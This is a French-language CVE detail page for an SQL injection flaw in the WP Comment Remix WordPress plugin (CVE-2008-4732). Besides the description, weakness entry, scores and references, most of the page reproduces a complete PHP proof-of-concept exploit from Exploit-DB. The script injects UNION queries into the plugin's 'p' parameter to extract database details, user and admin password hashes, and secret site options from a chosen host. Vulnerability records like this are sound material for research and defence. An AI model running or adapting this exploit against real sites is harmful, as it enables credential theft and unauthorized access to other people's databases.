CVE-2008-4732 : Détail

CVE-2008-4732

SQL Injection
A03-Injection
0.27%V3
Network
2008-10-24
08h00 +00:00
2018-10-11
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

SQL injection vulnerability in ajax_comments.php in the WP Comment Remix plugin before 1.4.4 for WordPress allows remote attackers to execute arbitrary SQL commands via the p parameter.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 6747

Date de publication : 2008-10-13 22h00 +00:00
Auteur : g30rg3_x
EDB Vérifié : Yes

<?php /** * WP Comment Remix 1.4.3 SQL Injection * Proof of Concept * By g30rg3_x <g30rg3x_at_chxsecurity_dot_org> * * Advisory: * http://chxsecurity.org/advisories/adv-3-full.txt * * PoC Mirror: * http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip * * Attention: * This is a Proof-of-Concept it was never intended to be fully functional * * Notes: * Uses cURL */ // Script Header function head() { print "\n WP Comment Remix 1.4.3 SQL Injection"; print "\n By g30rg3_x <g30rg3x_at_chxsecurity_dot_org>"; print "\n ------------------------------------------------"; print "\n This is a Proof-of-Concept it was never intended to be fully functional\n"; } // Usage Information function usage() { global $argv; head(); print "\n Usage: php {$argv[0]} <host> <path> <information> <table-prefix>\n"; print "\n <host>: Hostname or IP Address"; print "\n <path>: Path to WordPress (Defaults to: /)"; print "\n <information>: Information to Extract (Defaults to: relevant)"; print "\n dbinfo = Extract MySQL Current User, Database and Version"; print "\n admins = Extract Only Admins (users with level 10)"; print "\n users = Extract All Users (includes admins)"; print "\n options = Extract Relevant Options like active_plugins, secret, ..."; print "\n alloptions = Extrac All Options (Huge data would be directly printed out!)"; print "\n relevant = dbinfo + admins + options"; print "\n all = dbinfo + users + alloptions"; print "\n <table-prefix>: WordPress Tables Prefix (Defaults to: wp_)\n"; print "\n Examples:"; print "\n php {$argv[0]} foo.bar"; print "\n php {$argv[0]} foo.bar /wordpress/"; print "\n php {$argv[0]} foo.bar /wordpress/ all foo_"; print "\n"; exit(); } // cURL HTTP GET function GET($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array('Connection: Close')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_USERAGENT, 'WP-Comment-Remix 1.4.3 SQL Injection Proof-of-Concept'); $result = curl_exec($ch); curl_close($ch); if ( preg_match('%HTTP/[0-9.x]+ 200 OK%', $result) ) return $result; else return false; } // Obtain Database Information function obtainDBInfo() { global $prefix, $url; $injection = '/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(0x757365727B,user(),0x7D44427B,database(),0x7D76657273696F6E7B,version(),0x7D),10,11,12,13,14,15--'; $result = GET($url . $injection); preg_match_all('/user\{(?P<user>.+)\}DB\{(?P<DB>.+)\}version\{(?P<version>.+)\}/', $result, $captured, PREG_PATTERN_ORDER); $db['user'] = $captured['user'][0]; $db['name'] = $captured['DB'][0]; $db['version'] = $captured['version'][0]; return $db; } // Obtain WordPress Users Information function obtainUsersInfo($all = false) { global $prefix, $url; $injection = "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(0x757365727B,{$prefix}users.user_login,0x7D706173737B,{$prefix}users.user_pass,0x7D),10,11,12,13,14,15/**/FROM/**/{$prefix}users" . ( $all ? '' : ",{$prefix}usermeta/**/WHERE/**/{$prefix}users.ID={$prefix}usermeta.user_id/**/AND/**/{$prefix}usermeta.meta_key/**/REGEXP/**/0x757365725F6C6576656C/**/AND/**/{$prefix}usermeta.meta_value=10" ) . '--'; $result = GET($url . $injection); preg_match_all('/user\{(?P<user>.+)\}pass\{(?P<pass>.+)\}/', $result, $captured, PREG_PATTERN_ORDER); for( $i = 0; $i < count($captured['user']); $i++ ) $users[$captured['user'][$i]] = $captured['pass'][$i]; return $users; } // Obtain WordPress Options Information function obtainOptionsInfo($all = false) { global $prefix, $url; $injection = "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(option_name,0x7B7C,option_value,0x7C7D),10,11,12,13,14,15/**/FROM/**/{$prefix}options" . ( $all ? '' : '/**/WHERE/**/option_name/**/REGEXP/**/0x7369746575726C7C6C6F67696E7C757365727C706173737C617574687C7365637265747C73616C747C6163746976655F706C7567696E737C73656564' ) . '--'; $result = GET($url . $injection); preg_match_all('%<p>(?P<name>.+)\{\|(?P<value>.+)\|\}</p>%', $result, $captured, PREG_PATTERN_ORDER); for( $i = 0; $i < count($captured['name']); $i++ ) $options[$captured['name'][$i]] = $captured['value'][$i]; return $options; } // Set no time limit (only if safe mode is off) if ( !ini_get('safe_mode') ) set_time_limit(0); // Print usage if there is no host if ( !isset($argv[1]) ) usage(); // Header, Arguments and Generate URL head(); $host = $argv[1]; $path = isset($argv[2]) ? $argv[2] : '/'; $info = isset($argv[3]) ? $argv[3] : 'relevant'; $prefix = isset($argv[4]) ? $argv[4] : 'wp_'; $url = 'http://' . $host . $path . 'wp-content/plugins/wp-comment-remix/ajax_comments.php?p=0'; // Check if we can reach "ajax_comments.php" print "\n Does ajax_comments.php exist? ... "; $result = GET($url); if ( !$result ) { print "No"; print "\n -----------------------------------------------------------"; print "\n Seems that the site does not have WP Comment Remix installed"; print "\n OR the path you proportionate is incorrect."; print "\n Please review your arguments and try again.\n"; exit(); } print 'Yes'; // Check if is it possible to inject... // ToDo: Some WordPress installations return more than 15 columns (this is caused by some plugins that alter // the comments table structure and don't revert back this change) so this injection may fail A LOT in a non-default // enviroment (ie. sites with many plugins), so if you REALLY want this PoC to be more "functional" then improve // this part of the PoC; it was never my intention to deliver a "fully functional" Proof-of-Concept. print "\n Can we Inject SQL Code? ... "; $result = GET($url . '/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--'); if ( preg_match('/There are no comments for this post/', $result) ) { print "No"; print "\n --------------------------------------"; print "\n Seems that the host is already patched.\n"; exit(); } print 'Yes'; // Check table prefix but don't check if the user selected to obtain database information. if ( $info != 'dbinfo') { print "\n Is \"{$prefix}\" the table prefix? ... "; $result = GET($url . "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/{$prefix}users--"); if ( preg_match('/There are no comments for this post/', $result) ) { print "No"; print "\n ------------------------------------------------"; print "\n Seems that the table prefix \"{$prefix}\" is incorrect."; print "\n But this time we are not exiting, cause we can still extract"; print "\n the database information, so m just going to change your choice"; print "\n to dbinfo so you can still get that valuable information."; print "\n ------------------------------------------------\n"; $info = 'dbinfo'; } else { print 'Yes'; } } // Now is time to inject print "\n\n Seems that everything is fine so now it's super fun time :P..."; switch($info) { case 'all': $db = obtainDBInfo(); $users = obtainUsersInfo(true); $options = obtainOptionsInfo(true); break; case 'relevant': $db = obtainDBInfo(); $users = obtainUsersInfo(); $options = obtainOptionsInfo(); break; case 'dbinfo': $db = obtainDBInfo(); break; case 'admins': $users = obtainUsersInfo(); break; case 'users': $users = obtainUsersInfo(true); break; case 'options': $options = obtainOptionsInfo(); break; case 'alloptions': $options = obtainOptionsInfo(true); break; } /* It's Show Time */ // Database Information if ( !empty($db) ) { print "\n\n Database Information"; print "\n ---------------------"; print "\n MySQL User: {$db['user']}"; print "\n MySQL Version: {$db['version']}"; print "\n MySQL Database Name: {$db['name']}"; } // Users Information if ( !empty($users) ) { print "\n\n Users"; print "\n ---------"; foreach( (array) $users as $user => $pass ) { print "\n Username: {$user}"; print "\n Password: {$pass} " . ( strlen($pass) <= 32 ? '(MD5)' : '(Passhash)' ); print "\n ---------"; } } // Options Information if ( !empty($options) ) { print "\n\n Options"; print "\n ---------"; foreach( (array) $options as $name => $value ) { print "\n Name: {$name}"; print "\n Value: {$value}"; print "\n ---------"; } } // Good Bye =) print "\n\n Have Fun! =)\n"; ?> # milw0rm.com [2008-10-14]

Products Mentioned

Configuraton 0

Pressography>>Wp_comment_remix_plugin >> Version To (including) 1.4.3

    Pressography>>Wp_comment_remix_plugin >> Version 1.4

      Wordpress>>Wordpress >> Version *

      Références

      http://secunia.com/advisories/32253
      Tags : third-party-advisory, x_refsource_SECUNIA
      https://www.exploit-db.com/exploits/6747
      Tags : exploit, x_refsource_EXPLOIT-DB
      http://www.securityfocus.com/bid/31750
      Tags : vdb-entry, x_refsource_BID
      http://securityreason.com/securityalert/4492
      Tags : third-party-advisory, x_refsource_SREASON